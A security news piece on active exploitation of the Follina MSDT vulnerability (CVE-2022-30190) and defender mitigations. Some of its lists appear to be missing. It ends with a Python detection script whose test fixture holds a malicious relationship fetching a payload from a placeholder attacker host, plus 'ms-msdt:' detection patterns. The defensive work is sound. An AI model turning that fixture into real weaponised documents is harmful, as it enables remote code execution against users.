Attackers are leveraging Follina. What can you do?

As the world is waiting for Microsoft to push out a patch for CVE-2022-30190, aka “Follina”, attackers around the world are exploiting the vulnerability in a variety of campaigns.

A complex vulnerability

Microsoft has described CVE-2022-30190 as a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability, confirmed it affects an overwhelming majority of Windows and Windows Server versions, and advised on a workaround to be implemented until a patch is ready.

Vulnerability analysts and security researchers have shared their own views of the complexity of the issue(s) behind that one CVE:

The wider security community has been poking and creating proof-of-concept exploits for the flaw, as well as converting MSDT exploits so they can be used with other protocol handlers for a different kind of attack.

Attacks in the wild

After the attacks spotted in April and May, which revealed the existence of the flaw and its active exploitation to the wider security community, reports soon started trickling in about other campaigns leveraging it across the globe:

What can defenders do until patches are released?

We have already mentioned Microsoft’s advice, which involves disabling the MSDT URL protocol.

ACROS Security has released free micropatches for various editions of Windows and Windows Server, to be used via their 0patch agent.

SANS Senior Instructor Jake Williams recently answered plainly a number of questions regarding Follina, possible mitigations, and how to detect exploitation attempts.

Security companies have been adding signatures and rules for detecting malicious documents exploiting CVE-2022-30190, as well as providing general advice.
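As an added illustration of the kind of document-level detection rule vendors have been shipping (example code written for this page, not any vendor's signature), the script below opens a .docx and flags relationship parts that point to an external OLE object or remote template, and any part that embeds an `ms-msdt:` URI. It assumes the publicly documented structure of Follina samples, in which the document's relationship part references a remote HTML file through an external OLE-object relationship; the host name and sample documents are constructed placeholders.

```python
"""Heuristic .docx scan for the Follina relationship pattern (assumed from public
sample analyses, not from the article): an external OLE-object or remote-template
relationship, or an ms-msdt: URI anywhere in the package."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SUSPICIOUS_REL_TYPES = ("/oleObject", "/attachedTemplate")  # suffixes of relationship Type URIs
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)

def scan_docx(data: bytes) -> list[str]:
    """Return human-readable findings for a .docx supplied as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            # Any part that embeds the MSDT URL scheme directly is worth flagging.
            if MSDT_SCHEME.search(blob):
                findings.append(f"{name}: contains ms-msdt: URI")
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(blob)
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal package references are normal
                rtype, target = rel.get("Type", ""), rel.get("Target", "")
                if rtype.endswith(SUSPICIOUS_REL_TYPES):
                    findings.append(f"{name}: external {rtype.rsplit('/', 1)[-1]} -> {target}")
    return findings

def build_sample_docx(rels_xml: str) -> bytes:
    """Constructed test data: a minimal zip with only the relationship part that matters here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

# Constructed samples; attacker.example is a placeholder, not a real indicator.
SUSPICIOUS_RELS = f"""<Relationships xmlns="{PKG_NS}">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.example/payload.html!" TargetMode="External"/>
</Relationships>"""
BENIGN_RELS = f"""<Relationships xmlns="{PKG_NS}">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("suspicious", SUSPICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_docx(build_sample_docx(rels)))
```

Treat a hit as a triage signal rather than a verdict: legitimate documents can carry external OLE links, so the finding should be paired with the payload fetch and the `msdt.exe` process telemetry mentioned in the detection advice above.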
